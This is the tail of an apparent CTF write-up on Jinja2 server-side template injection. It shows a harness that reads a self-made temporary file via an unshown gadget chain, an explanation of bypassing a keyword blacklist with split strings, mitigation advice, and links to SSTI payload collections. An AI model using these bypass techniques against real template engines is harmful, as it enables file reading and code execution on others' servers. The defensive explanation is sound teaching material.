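    """Write a file we own, then read it back through the gadget chain."""
    with tempfile.NamedTemporaryFile('w', suffix='.txt', delete=False) as fh:
        fh.write('app.py stand-in\n')
        path = fh.name
    try:
        return read_file_via_gadget(path)
    finally:
        os.unlink(path)
```

The keyword blacklist in app.py fails because the dangerous names can be spelled as 'o'+'s' or sliced strings, while the chain itself only needs the dunder attributes; a sandbox that refuses every underscore-prefixed attribute cuts the chain at __class__, and rendering user input as data ({{ text }}) rather than as template source removes the problem entirely.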
References
https://blog.csdn.net/qq_45521281/article/details/106639111
https://blog.csdn.net/Alexhcf/article/details/108400293
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection#jinja2
https://zhuanlan.zhihu.com/p/32138231
https://webcache.googleusercontent.com/search?q=cache:mBcxIwryiNcJ:https://www.cnblogs.com/MisakaYuii-Z/p/12407760.html+&cd=2&hl=zh-CN&ct=clnk
https://www.cnblogs.com/h3zh1/p/12694933.html
Method 2: PIN brute force
todo: look at this later when there is time.